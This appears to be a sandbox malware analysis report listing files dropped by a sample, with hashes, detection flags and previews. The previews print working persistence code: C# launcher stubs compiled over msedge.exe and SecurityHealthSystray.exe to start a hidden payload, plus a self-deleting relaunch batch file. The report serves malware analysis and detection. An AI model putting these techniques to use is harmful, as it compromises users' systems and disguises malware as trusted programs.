                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.0.cs

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                Category:dropped
                                                                Size (bytes):418
                                                                Entropy (8bit):5.084498881785233
                                                                Encrypted:false
                                                                SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLVNAJCrzlsiFkD:JNVQIbSfhWLzIiFkMSfhQMrFkD
                                                                MD5:F42E0CF37A6A85D2271A1CCBB1AC2D8F
                                                                SHA1:4329B8D2DAA467A30012D1662EA3AA4F12042441
                                                                SHA-256:8BEE6D97653E63AFB2B75A498E413C673292B4EFDE438C3797BCC61F97632354
                                                                SHA-512:A787229449880B2EBE19B8673E53E778F4C6A4E6AEDBAC7B2648973F181536E20068F95EEF41BF7D1A20E34B807BD1494E399BE8E5E33717E959C53109ACC709
                                                                Malicious:false
                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe"); } catch { } }).Start();. }.}.

                                                                C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):5.124684345326621
                                                                Encrypted:false
                                                                SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923ffP:Hu7L//TRRzscQyv
                                                                MD5:7060C1F1AF3147229B92ABC67DE785C8
                                                                SHA1:98D762241AFD46F3DA3131A640391793BE027EC3
                                                                SHA-256:3ECCAFF5CB2B3A7BC4472F9A7F7759F247687CD5C7C72F012C62B1B93A71D4E9
                                                                SHA-512:3326B1A3BC0511139A1EA8CA414A61A76D7877DE96D6D85758E395318D19E63198E90FE94A8FE4FC678D8B7FEF2DF7086B4A612910D56C409A4F9BB494593768
                                                                Malicious:true
                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.0.cs"

                                                                C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.out

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):767
                                                                Entropy (8bit):5.246006180469514
                                                                Encrypted:false
                                                                SSDEEP:12:KMi/I/u7L//TRRzscQyWKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzstyWKax5DqBVKVrdFAMBt
                                                                MD5:291BFD9913051415CABE238D15845299
                                                                SHA1:E0FA120E1EC7288772F69E098EE357BECB716CAD
                                                                SHA-256:222426602C8166A636F4C826E1E627AD13999C778A5F479D537E20D2458DEDD1
                                                                SHA-512:3A0643A5396F4972B3F644DD296D93CB766DD1ACFB70C7F5451991E84A9C8B5471507054B81D6C770A9E43A20EA63E7AD538862BF9192CD795C356F67D5D444B
                                                                Malicious:false
                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.0.cs

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                Category:dropped
                                                                Size (bytes):403
                                                                Entropy (8bit):5.057558208989162
                                                                Encrypted:false
                                                                SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLVNAJCrzlsiFkD:JNVQIbSfhV7TiFkMSfhQMrFkD
                                                                MD5:0EFA1B230FF0ABD72D969F3FEB184723
                                                                SHA1:79B3A1B1C3180D9229521A70C0C1D9600E96BCF0
                                                                SHA-256:719262C345B130CF0909BF4F20FFA3BCC158CD107FCCF4071B16B481C4F51CAD
                                                                SHA-512:F9926926F99E9A0DB2A987C2172082B2AF42704C709AB82EDBD9E92ABE11C2B8D13BBC7608940B862A9B5687CF3428BC754C19F3957258C4B848ACDC7DAC57DC
                                                                Malicious:false
                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe"); } catch { } }).Start();. }.}.

                                                                C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):251
                                                                Entropy (8bit):5.113583193805236
                                                                Encrypted:false
                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fYWV0WH:Hu7L//TRq79cQywWV0WH
                                                                MD5:5F241A2594BEC57D370116C150779700
                                                                SHA1:890377CA9BBA48EAE06639EDA5A98E9827E3ECEF
                                                                SHA-256:24326878859C8241595DF6B619CE00143A436B1567D3F4A343B7E2945F69F5D2
                                                                SHA-512:1DF086B2BDFC31CE2C933FF82900DF2BBE137C731500955D7A01FA4EC89BCBD0D047FF0380D6E5B2AE90EB966D5FA39D1EF0293145681B5E5116992A69E0862F
                                                                Malicious:false
                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.0.cs"

                                                                C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.out

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):752
                                                                Entropy (8bit):5.258679628746614
                                                                Encrypted:false
                                                                SSDEEP:12:KMi/I/u7L//TRq79cQywWV0WOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tyhV0WOKax5DqBVKVrdV
                                                                MD5:F181746A49F59716A4E6EA6105B34967
                                                                SHA1:C5461B1B38EA9AA161B5D7D77FD731C6B5C04488
                                                                SHA-256:960D4513DDF7FACB8545C8791FD025D213812C0D2260A31B4036EC247AB18740
                                                                SHA-512:6A2AE5633262D98C6E20BC7444B38DFE3297E117077A40B9F4D2A995DB9D1D80EE8E267BB6B3534B999B345686867B098B96CD95DC834A393315E6404C5B8922
                                                                Malicious:false
                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                C:\Users\user\AppData\Local\Temp\2e3777aa9f8e813616590df35047cd9710d88b08

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):292
                                                                Entropy (8bit):5.78023186349386
                                                                Encrypted:false
                                                                SSDEEP:6:dxfsWFpbaKuH1hN83WUItH3TEkcveKJh0Ag3BXkCSg2WdAKq:PfsWFVNuVhdtHjcveKv0Zsg2Wlq
                                                                MD5:FDB5BEDC94958A86106CF7EF6666798E
                                                                SHA1:5E79BA9E5A2EA63A7EE76EAD9236049B9EB76D38
                                                                SHA-256:1B5A9D80C6E7AC3584A21D90947DF4873BB8A293FE24BDF65F4DB949FD40AA02
                                                                SHA-512:C5455F3694B8F832D093928B0171EC6F91F5102F487E840C3A1E19ECCCED8D102EACA3A7D983719F9F18BAF19D73910305F8FD586C077BD56242B1C325ADF20A
                                                                Malicious:false
                                                                Preview:H4sIAAAAAAAEAJWQ3WrCQBBGX6V4XQI2UtA7G2NbsbT1p0KdUibJREM3u3FnEhOf3m2gInhjL2fmnO+DWXeCAcAq04nZM8CDRZ1kegPAW1IqsgkAFuHs8/0g4YR3Tf68eBvXm/KDPKqpc9vqM4pNRba5hj1VRTGyJJX9l4TMlEfKNT0Og2//DmDesFDujVDQe7UYKwpURlrcRdDKC+kyrAuybhfTk2E5i10yWRc6ohRLJTe/41/gnETcH/iSRpUa3Vr8I6YAUFX/vlv1/Knfwl9Hd3FNulMBAAA=

                                                                C:\Users\user\AppData\Local\Temp\PElAqcNNWD

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):106496
                                                                Entropy (8bit):1.136413900497188
                                                                Encrypted:false
                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\RES71E1.tmp

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Fri Oct 11 00:41:55 2024, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1928
                                                                Entropy (8bit):4.610632423525989
                                                                Encrypted:false
                                                                SSDEEP:48:VRaLzEvR8kKqxmslmuulB+hnqXSfbNtmh7:ranARlKqEs2TkZzNty7
                                                                MD5:A9853833140419C8DF5A89D426E89E41
                                                                SHA1:EB2CA05BEE42A1485BB4E4E4C4CDD328CBDB37D5
                                                                SHA-256:30439B3493B65359A2C37A78C9462ADF8A1078D0FA6D92723DEF797C050CB163
                                                                SHA-512:45096CFB63F2B2BB9220C3E048D49CEF61DF3B8FD65594321A7A605DF490A7CD3B6BE0C6D4D1232928E7EFCE12665C697CC9DEC76F65896AFA5648589F1A6851
                                                                Malicious:false
                                                                Preview:L...St.g.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES71E1.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

                                                                C:\Users\user\AppData\Local\Temp\RES73C6.tmp

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Fri Oct 11 00:41:55 2024, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1952
                                                                Entropy (8bit):4.549300718386903
                                                                Encrypted:false
                                                                SSDEEP:24:HLbW96XOaQqH6wKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:UaQqxKqxmEluOulajfqXSfbNtmh5Z
                                                                MD5:8BC6D896701452EF059B3C4CC1348515
                                                                SHA1:7632E6D81B77A8457E408F83E008ABDC7CFD7224
                                                                SHA-256:2B8AC01AE075EA5E1ABB89B500BF5D882F2FB6A096A431758353BBB79DAAA42F
                                                                SHA-512:8480B6DE881B56B51946A0525E826E87A905B534A74CED93160723470D793BFCB1C07A5830A1B334F6E772143AA602910EF1353F872E4C35E222E63C936D9AC1
                                                                Malicious:false
                                                                Preview:L...St.g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP..................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES73C6.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                C:\Users\user\AppData\Local\Temp\TNlmI3foeW

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.8553638852307782
                                                                Encrypted:false
                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\b8uDE6ZpY0

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25
                                                                Entropy (8bit):4.243856189774724
                                                                Encrypted:false
                                                                SSDEEP:3:ohFGkK:ohFGh
                                                                MD5:5A2EDD982A0E5B5761B5944E594EBD00
                                                                SHA1:4053C59F1903B9DE174AAB2421FB58F4CAEBC0E3
                                                                SHA-256:E4045B9103E516765919BAB4716BA9FCE72D820EB1EF6B9094C06F5DDE45B2AE
                                                                SHA-512:FB988C86D007A0291180DD86E6FA0CC6DB265D78A1DC7D146D40497F5CA1E13E8234B7F852579F7CF230802E7B27C8952449207A5891FE03DDFA3702C502778F
                                                                Malicious:false
                                                                Preview:2R4F7ycKY84PlJV7TKPs5AM1l

                                                                C:\Users\user\AppData\Local\Temp\hJL2wRYIJN

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.5707520969659783
                                                                Encrypted:false
                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\hzSiynbOWa

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):51200
                                                                Entropy (8bit):0.8746135976761988
                                                                Encrypted:false
                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\jmWZu0Jun8

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.8553638852307782
                                                                Encrypted:false
                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\lWstwPVe1A

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.121297215059106
                                                                Encrypted:false
                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\osksi0eFxJ

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.5707520969659783
                                                                Encrypted:false
                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\pnFbDzPnWC

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.6732424250451717
                                                                Encrypted:false
                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):215
                                                                Entropy (8bit):5.148812615228591
                                                                Encrypted:false
                                                                SSDEEP:6:hCijTg3Nou1SV+DE1NJAVwBEyKOZG1923fNch1H:HTg9uYDExAweoWvH
                                                                MD5:BC506A6C97081E6D059D7DEAB995DB33
                                                                SHA1:48EA5D83019686D132E38802968453729581EE77
                                                                SHA-256:8B600101C04067ED61692C8270F686C587480CEA9AF3D7993931A8CB14ED5FE9
                                                                SHA-512:8F369DBD03B2A6519B905705D4A28ADF647A73D5CCD743866DB67C20BB72DA2FBE59F406653113E572CA8FC2DC65E2E6FCA77C22F946CB65C79518CAFE9E17DC
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\lv961v43L3.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\rjP0QDXGdr.bat"

                                                                C:\Users\user\AppData\Local\Temp\rvIb6rk5gH

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):98304
                                                                Entropy (8bit):0.08235737944063153
                                                                Encrypted:false
                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\t5d8vVvuo7

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.5712781801655107
                                                                Encrypted:false
                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
